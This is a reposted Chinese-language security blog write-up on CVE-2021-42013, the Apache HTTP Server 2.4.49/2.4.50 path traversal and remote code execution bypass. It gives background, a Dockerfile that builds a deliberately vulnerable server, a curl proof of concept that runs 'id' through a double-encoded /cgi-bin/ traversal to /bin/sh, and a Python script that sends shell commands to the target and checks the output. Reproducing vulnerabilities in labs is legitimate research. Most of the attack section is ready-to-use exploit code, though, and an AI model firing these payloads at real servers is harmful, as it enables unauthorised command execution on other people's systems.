Apache任意文件读取补丁绕过(CVE-2021-42013)

admin 2022年5月24日09:46:44安全漏洞评论50 views4377字阅读14分35秒阅读模式

This past Monday, October 4th, Apache disclosed a vulnerability  introduced on Apache HTTP Server 2.4.49 known as CVE-2021-41773. At the  same time, update 2.4.50 was released, fixing this vulnerability. The  vulnerability allows an attacker to bypass Path traversal protections,  using encoding, and read arbitrary files on the webserver’s file system.  Both Linux and Windows servers running this version of Apache are  affected.

This vulnerability was introduced on 2.4.49, on a patch that aimed to  improve performance in the validation of the URL. The new validation  method could be bypassed by encoding the ‘.’ character. If the Apache  webserver configuration is not set to “Require all denied”, the  exploitation is relatively trivial. By encoding these characters and  modifying an URL with the payload, a classic path traversal is possible.

Due to the simple exploitation of this vulnerability there are  already several public Proof of Concept scripts available on the  internet. A simple demo can also be made using curl, as the attacker  needs only to go back through enough directories to access the root of  the server with a slight modification that disrupts the normalization of  the URL.

It is also possible to perform Remote Code Execution if mod_cgi is  enabled by using a URL prefixed by /cgi-bin/, which is a functionality  not used in modern web technologies. However, many older web deployments  still rely on it to function.

On October 5, 2021 and October 7, 2021, the Apache Software Foundation released two security announcements for the Apache HTTP Server that disclosed the following vulnerabilities:

  • CVE-2021-41524: Null Pointer Dereference Vulnerability

  • CVE-2021-41773: Path Traversal and Remote Code Execution Vulnerability

  • CVE-2021-42013: Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773)

For descriptions of these vulnerabilities, see the Apache Security Announcement. For additional information, see the Cisco TALOS blog post, Threat Advisory: Apache HTTP Server zero-day vulnerability opens door for attackers.

概述

Apache HTTP Server 2.4.50 中对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护,则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本,则可以允许远程代码执行。这些漏洞已被广泛利用。与CVE-2021-41773类似,此漏洞由不安全的配置触发,即,如果网站配置中,将 根目录 / 配置为

Require all granted

其实说白了就是/../../../../../bin/sh两次url编码的结果的,上一个漏洞是一次url编码,上一次的修复只是过滤了一些简单的字符仅此而已。有点像ctf的绕过题目,开发和黑客的斗智斗勇,可以去研究一下补丁的修复的方法。

复现环境搭建

https://hub.docker.com/r/blueteamsteve/cve-2021-41773

自己本地搭建的docker

FROM httpd:2.4.50

RUN set -ex 
    && sed -i "s|#LoadModule cgid_module modules/mod_cgid.so|LoadModule cgid_module modules/mod_cgid.so|g" /usr/local/apache2/conf/httpd.conf 
    && sed -i "s|#LoadModule cgi_module modules/mod_cgi.so|LoadModule cgi_module modules/mod_cgi.so|g" /usr/local/apache2/conf/httpd.conf 
    && sed -i "s|#Include conf/extra/httpd-autoindex.conf|Include conf/extra/httpd-autoindex.conf|g" /usr/local/apache2/conf/httpd.conf 
    && cat /usr/local/apache2/conf/httpd.conf 
        | tr 'n' 'r' 
        | perl -pe 's|<Directory />.*?</Directory>|<Directory />n    AllowOverride nonen    Require all grantedn</Directory>|isg' 
        | tr 'r' 'n' 
        | tee /tmp/httpd.conf 
    && mv /tmp/httpd.conf /usr/local/apache2/conf/httpd.conf

然后运行如下命令:

docker build -t  httpd:2.4.50rce .
docker run  -d -p 7006:80 httpd:2.4.50rce

复现结果

poc如下:
curl --data "echo;id" 'http://xxx.xxxx:XXX/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'

Apache任意文件读取补丁绕过(CVE-2021-42013)

1633785053509

脚本化

import requests
import sys

host = sys.argv[1]
port = sys.argv[2]

url_dir = 'http://'+sys.argv[1]+":"+sys.argv[2]+'/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash'
headers = {
    'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36',
    'Accept-Encoding':'gzip, deflate',
    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9'
}
data = "echo;echo QWERTYUI "
s = requests.Session()
req = requests.Request('POST',url_dir,data = data,headers=headers)
pred = req.prepare()
pred.url = url_dir
reqPost = s.send(pred,verify=False,proxies={"http":"127.0.0.1:8080"})
if "QWERTYUI" in reqPost.text:
    print "SUCCESS"
else:
    print "Fail"

参考链接

https://www.o2oxy.cn/3740.html

https://downloads.apache.org/httpd/CHANGES_2.4

https://mp.weixin.qq.com/s/A3zm4ArkYKfrTcgckQmo_w

https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/cve-2021-41773-apache-web-server-path-traversal/

https://blog.talosintelligence.com/2021/10/apache-vuln-threat-advisory.html



原文始发于微信公众号(无级安全):Apache任意文件读取补丁绕过(CVE-2021-42013)

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月24日09:46:44
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  Apache任意文件读取补丁绕过(CVE-2021-42013) http://cn-sec.com/archives/576336.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: